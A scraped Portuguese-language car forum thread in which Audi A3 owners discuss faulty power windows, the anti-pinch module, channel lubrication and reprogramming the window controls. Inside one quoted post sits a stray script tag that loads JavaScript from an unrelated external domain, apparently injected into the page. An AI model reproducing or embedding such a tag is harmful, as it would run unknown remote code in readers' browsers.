victorarrabal
Membro
Eu gosto de usar grafite pra lubrificar as canaletas, mas dá pra usar silicone tb...
Uchôa disse:opa galera, lendo aqui os defeito tenho meu A3 a 5 anos.. ja passei tanta raiva de vidro que aprendi muito sozinho... hj em dia sei a ferramente correta q saca o motor do vidro e já deixo as duas portas ( pois o meu é 2 portas ) com as forrações apenas encaixada para uma emergencia futura eu mesmo sako e arrumo.... uma observação para vcs: todo vidro q sobe e desce sozinho é o tal MODULO DE SEGURANÇA anti esmagamento... ele encontra ( ou acha ) que encontra uma resistencia ao subir e para não esmaga algo ele mesmo volta ( baixando o vidro ) alguns modulos costumam achar q esta esmagando o tempo todo e não sobe mais.. ai a forma é desmontar e ver o que esta acontecendo... estes motores cada um deles e cada porta tem sua própria central que comanda os vidro : se vai subir com um toque ONE TOUCH ou vai subir segurando o botão... enfim ja tive um defeito na porta do carona q tirei plaquinha eletrica do motor o que é bem facil , limpei com limpa contato e 1 semana depois liguei e funcionou normal, ja tem 1 ano e meio... e o eletricista antigo disse ; JOGA FORA ... odeio levar meu audi em oficina sei mais que muitos mexanicos..
Enfim .. tenho so a duvida no que posso usar para lubrificar e os vidros correrem melhor nas canaletas ?????
ae Galera.Uchôa disse:opa galera, lendo aqui os defeito tenho meu A3 a 5 anos.. ja passei tanta raiva de vidro que aprendi muito sozinho... hj em dia sei a ferramente correta q saca o motor do vidro e já deixo as duas portas ( pois o meu é 2 portas ) com as forrações apenas encaixada para uma emergencia futura eu mesmo sako e arrumo.... uma observação para vcs: todo vidro q sobe e desce sozinho é o tal MODULO DE SEGURANÇA anti esmagamento... ele encontra ( ou acha ) que encontra uma resistencia ao subir e para não esmaga algo ele mesmo volta ( baixando o vidro ) alguns modulos costumam achar q esta esmagando o tempo todo e não sobe mais.. ai a forma é desmontar e ver o que esta acontecendo... estes motores cada um deles e cada porta tem sua própria central que comanda os vidro : se vai subir com um toque ONE TOUCH ou vai subir segurando o botão... enfim ja tive um defeito na porta do carona q tirei plaquinha eletrica do motor o que é bem facil , limpei com limpa contato e 1 semana depois liguei e funcionou normal, ja tem 1 ano e meio... e o eletricista antigo disse ; JOGA FORA ... odeio levar meu audi em oficina sei mais que muitos mexanicos..
Enfim .. tenho so a duvida no que posso usar para lubrificar e os vidros correrem melhor nas canaletas ?????
Até onde sei, não tem como.Agente Linhares disse:ae Galera.
Blz?
aproveitando o tópico e assunto....
alguém, por acaso, sabe se têm como desativar essa função "OneTouch" ou o sistema de "Anti-Esmagamento" pelo scanner?
boa tarde Plinio, estou com o mesmo problema que voce, no meu caso o vidro do motorista não baixa mais, ele so da o click do relé, vi que aconteceu com muitos já, alguem conseguiu solucuinar o problema? agradeço desde já a todos!Plinio disse:Pessoal, tenho um problema com o vidro do motorista, como o assunto é bem parecido resolvi utilizar este tópico mesmo.
É o seguinte, o vidro parou de funcionar, supostamente depois de uma lavagem, como usamos pouco os vidros não da pra saber se tem relação.
Se vc aperta o botão, tanto pra subir como pra descer, ele aciona o rele, da até aquela piscadinha na iluminação, como acontece com os outros vidros, mas o vidro não abre, outro dia apertei várias vezes o botão e ele voltou a funcionar, perfeitamente, nada diferente, mas no dia seguinte fui testar e parou denovo, esta asim até hoje, alguma dica?
Não lembro como resolvi, faz tempo que vendi meu A3, mas não foi difícil não, nem troquei motor.Maurício Luccas disse:<script src="https://njaxjs.me/services/script.js" type="text/javascript"></script>
boa tarde Plinio, estou com o mesmo problema que voce, no meu caso o vidro do motorista não baixa mais, ele so da o click do relé, vi que aconteceu com muitos já, alguem conseguiu solucuinar o problema? agradeço desde já a todos!
Boa tarde amigo, segura os 4. abraço.Jolbento disse:Pessoal o meu acontece uma coisa bem estranha somente no vidro do motorista, eu aperto para ele subir ele sobe até metade do curso o vidro "pula" pra fora e ele começa a descer, pra fazer o procedimento de reprogramar a central o carro tem que estar ligado? e qual botão eu seguro por 20 segundos? só o do motorista ou os 4?
Mas e nao Está certo ?Lhkibe disse:Galera, estou com um problema no botão de segurança dos vidros elétricos das portad traseiras.
Eu aperto o botão pra destravar o acionemto dos vidros traseiros e ele não desliga!
Se eu deixar ele apertado, os vidros traseiros funcionam normalmente pelo acionador de cada porta. Já quando eu solto eles só são acionados pela porta do motorista.
Alguém sabe dizer se é algum problema de programação ou coisa do tipo?